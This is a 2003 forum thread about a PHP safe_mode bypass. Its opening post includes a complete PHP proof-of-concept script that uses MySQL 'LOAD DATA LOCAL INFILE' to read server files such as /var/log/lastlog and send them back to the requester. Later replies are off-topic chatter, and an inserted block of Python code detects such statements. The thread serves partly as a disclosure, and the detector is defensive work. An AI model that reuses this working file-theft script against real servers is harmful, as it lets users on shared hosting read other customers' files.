Old 05-04-2003, 05:55 PM   #1
 
Join Date: May 2003
Posts: 56
Default Some PHP insight ...

PHP includes a commonly used feature known as Safe Mode ... When enabled.. scripts are very highly limited in their ability to access or execute local files.. among other things ... PHP relies on a wrapper function around all file system calls to perform access checks.. but unfortunately.. the bundled MySQL client library has not been modified to perform such checks on "LOAD DATA INFILE LOCAL" statements ...
If someone has access to a MySQL server (either provided by you or themselves).. they can use it as a proxy by which to download files residing on the safe_mode-enabled web server ... For large ISPs relying on this feature for individual customer privacy.. it could mean clients accessing each other's files.. or viewing of files on an improperly secured server ...

Fix :

Currently none exists ... You may use other PHP safe_mode functions to disable the use of the MySQL client library.. or secure your servers in a proper fashion ... A suggested fix for the PHP developers might be to scan mysql_query()s for strings similar to "LOAD DATA LOCAL INFILE" ...

PHP Safe Mode Problem

The attached script will (once configured correctly) attempt to read "/var/log/lastlog" via the SQL daemon and return it to the client ...

$ cp safe_mode.php /www
$ wget -qO lastlog_via_mysql localhost/safe_mode.php
$ diff /var/log/lastlog lastlog_via_mysql; echo $?
0

This script will connect to a database server running locally or otherwise.. create a temporary table with one column, use the LOAD DATA statement to read a (possibly binary) file.. then read it back to the client.

Any type of file may pass through this 'proxy'. Although unrelated, this may also be used to access files on the DB server (although they must be world-readable or in MySQLd's basedir.. according to docs)
*/


$host = 'localhost';
$user = 'root';
$pass = 'letmein';
$db = 'test_database';

$filename = '/var/log/lastlog'; /* File to grab from [local] server */
$local = true; /* Read from local filesystem */


$local = $local ? 'LOCAL' : '';

$sql = array (
    "USE $db",

    'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',

    "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS "
    . "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
    . "ESCAPED BY '' "
    . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",

    "SELECT a FROM $tbl LIMIT 1"
);

Header ('Content-type: text/plain');

mysql_connect ($host, $user, $pass);

foreach ($sql as $statement) {
    $q = mysql_query ($statement);

    if ($q == false) die (
        "FAILED: " . $statement . " " .
        "REASON: " . mysql_error () . " "
    );

    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;

    echo $r [0];
    mysql_free_result ($q);
}


Sincerely
CourtneyDS
CourtneyDS is offline   Reply With Quote
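
The fix suggested in post #1 (scanning statements for "LOAD DATA LOCAL INFILE"), sketched as an added example that is not part of the original thread or of PHP's source: a plain substring match misses statements that use comments, different case or the optional LOW_PRIORITY/CONCURRENT modifiers, and it fires on quoted text, so this Python check tokenizes the statement first. The function names are hypothetical, every sample statement except the one the posted script builds is constructed, and the body of a "/*! ... */" comment is always treated as executed, which is the conservative assumption.

```python
import re

# MySQL lexical pieces relevant to the check. "/*!" is tried before the plain
# comment rule because the server executes the body of such a comment.
_TOKEN = re.compile(
    r"(?P<marker>/\*!\d*|\*/)"
    r"|(?P<comment>/\*.*?\*/|#[^\n]*|--(?=\s|$)[^\n]*)"
    r"|(?P<quoted>'(?:[^'\\]|\\.|'')*'"
    r'|"(?:[^"\\]|\\.|"")*"'
    r"|`(?:[^`]|``)*`)"
    r"|(?P<word>[A-Za-z_][A-Za-z0-9_$]*)",
    re.S,
)

def keywords(sql):
    """Upper-cased word stream: comments dropped, quoted text masked."""
    return [m.group().upper() if m.lastgroup == "word" else "<quoted>"
            for m in _TOKEN.finditer(sql) if m.lastgroup in ("word", "quoted")]

def load_data_kind(sql):
    """'LOCAL' (file read on the client side), 'SERVER', or None."""
    t = keywords(sql) + ["", "", ""]   # padding so the look-ahead never overruns
    for i in range(len(t) - 5):
        if t[i:i + 2] != ["LOAD", "DATA"]:
            continue
        j = i + 2
        if t[j] in ("LOW_PRIORITY", "CONCURRENT"):
            j += 1
        local = t[j] == "LOCAL"
        if t[j + local] == "INFILE":
            return "LOCAL" if local else "SERVER"
    return None

def audit(statements):
    """(index, kind) for each statement that loads a file."""
    return [(i, k) for i, s in enumerate(statements) if (k := load_data_kind(s))]

# Statement 0 is the one the posted script builds (table name constructed);
# the others are constructed variants and look-alikes.
SAMPLE = [
    "LOAD DATA LOCAL INFILE '/var/log/lastlog' INTO TABLE A1052081700 FIELDS "
    "TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' "
    "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
    "load/**/data low_priority\n local infile 'x' into table t",
    "/*!50000 LOAD DATA LOCAL INFILE 'x' INTO TABLE t */",
    "LOAD DATA INFILE '/tmp/x' INTO TABLE t",
    "SELECT 'LOAD DATA LOCAL INFILE' AS note",
    "SELECT 1 -- LOAD DATA LOCAL INFILE 'x'",
]
```

audit(SAMPLE) reports statements 0 to 2 as LOCAL and statement 3 as SERVER, and passes the two look-alikes. A substring match on the upper-cased text would miss statement 1 and flag statements 4 and 5.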
Old 05-04-2003, 06:21 PM   #2
Site Team
 
Join Date: Dec 2002
Posts: 15,233
Default

Thank you for that. I will test my server.
__________________
LNXPS.NET - The XPS Library (http://www.LNXPS.NET)
David Lindon is offline   Reply With Quote
Old 05-04-2003, 09:22 PM   #3
 
Join Date: May 2003
Posts: 56
Default

Hopefully that code will be of some assistance to you David ...

It was quite some time ago ( Maybe a month or so ) that I read something else but it concerned PHP / MySQL and Apache servers ...

The article and code did draw my concern so I burnt it on CD-ROM ... I will see if I can find it.. it may or may not be of interest to you ...

Sincerely
CourtneyDS
CourtneyDS is offline   Reply With Quote
Old 05-04-2003, 10:54 PM   #4
Solid State Member
 
Join Date: May 2003
Posts: 9
Default

CourtneyDS, are you not the person who hacked the LTI forum?
jasynder is offline   Reply With Quote
Old 05-05-2003, 11:27 AM   #5
Site Team
 
Join Date: Dec 2002
Posts: 15,233
Default

Quote:
Originally posted by CourtneyDS
Hopefully that code will be of some assistance to you David ...

It was quite some time ago ( Maybe a month or so ) that I read something else but it concerned PHP / MySQL and Apache servers ...

The article and code did draw my concern so I burnt it on CD-ROM ... I will see if I can find it.. it may or may not be of interest to you ...

Sincerely
CourtneyDS
Thanks that would be helpful.
Quote:
CourtneyDS, are you not the person who hacked the LTI forum?
I think so or doesn't like eyelfix.
David Lindon is offline   Reply With Quote
Old 05-12-2003, 05:58 PM   #6
 
Join Date: May 2003
Posts: 56
Default

jasynder :
Quote:
CourtneyDS, are you not the person who hacked the LTI forum?
Is there any need to crack something that gives you what you are looking for in three (3) simple queries.. ? ... ?

NONYA / Mohamed Tarek.. I would strongly advise reading a little more in depth on PHP ... Being from Cairo.. I am sure you have more advanced reading material

Eyelfixit / Rejean.. LMAO !

Sincerely
CourtneyDS
CourtneyDS is offline   Reply With Quote
Old 02-12-2004, 05:34 AM   #7
Daemon Poster
 
Join Date: Feb 2004
Posts: 838
Default Re: Some PHP insight ...

hum u have a problem husten. i can see wats roing with it but i am a busy person so i can help. post it on me site and ill help u.
__________________
HomeSite: www. n-computers.co.uk, SupportForum: forum. n-computers.co.uk
Processor:AMD XP2600+ 2.00GHz.
Memory:1.5GB HD:80Gb, 40GB.
Video:800 x 600 in64KColors.
O/S:Windows XP Pro SP2 CRACKED. PLEASE DO NOT CHANGE MY SIG, IT HAS BEEN THE SAME FOR 2 YEARS SO LEAVE IT.
Novartic_ is offline   Reply With Quote
Old 02-15-2004, 06:14 AM   #8
Guru
 
Join Date: Dec 2003
Location: Britain
Posts: 13,293
Default

Is it just me, or does Novartic get more and more annoying every time he posts! If you can see something wrong with it; why don't you just tell us and be done with it! Without all of this Bureaucracy!
__________________
A Knight is sworn to Honour. His heart knows only Virtue. His blade defends the helpless. His might upholds the Weak. His word speaks only truth. His wrath undoes the Wicked.
Lord Kalthorn is offline   Reply With Quote
Old 02-25-2004, 06:09 AM   #9
Daemon Poster
 
Join Date: Feb 2004
Posts: 838
Default Re: Some PHP insight ...

hay dont u start. i cant help it if im dislexic.
Novartic_ is offline   Reply With Quote
Old 02-25-2004, 07:24 AM   #10
Guru
 
Join Date: Dec 2003
Location: Britain
Posts: 13,293
Default Re: Some PHP insight ...

Quote:
Originally Posted by novartic
hay dont u start. i cant help it if im dislexic.
You're not dislexic! You just don't type properly! Nah - I was just being silly about the you get more and more annoying. I have come to find your bad typing your most endearing quality - not a good sign but still.

Can't you just tell her here - it would be much easier - or has she already asked you at your, and I use the term as loosely as possible, Website already?
Lord Kalthorn is offline   Reply With Quote
All times are GMT -5. The time now is 06:37 PM.